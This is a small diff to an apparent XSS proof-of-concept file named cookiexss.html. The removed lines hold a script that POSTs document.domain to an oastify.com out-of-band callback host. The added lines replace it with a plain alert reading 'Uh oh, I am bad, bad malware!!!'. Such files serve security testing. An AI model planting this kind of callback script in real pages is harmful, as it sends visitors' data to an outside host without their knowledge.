--- a/cookiexss.html
+++ b/cookiexss.html
@@ -1,14 +1,3 @@
-<!DOCTYPE html>
-<html>
-<body>
-    
-<h1>cookie hacked</h1>
-    <script>
-fetch('https://xbcerwf2m96mfd5rxmu06jb4kvqmec21.oastify.com', {
-method: 'POST',
-mode: 'no-cors',
-body:document.domain
-});
-</script>
-</body>
-</html>
+<script>
+        alert('Uh oh, I am bad, bad malware!!!')
+    </script>
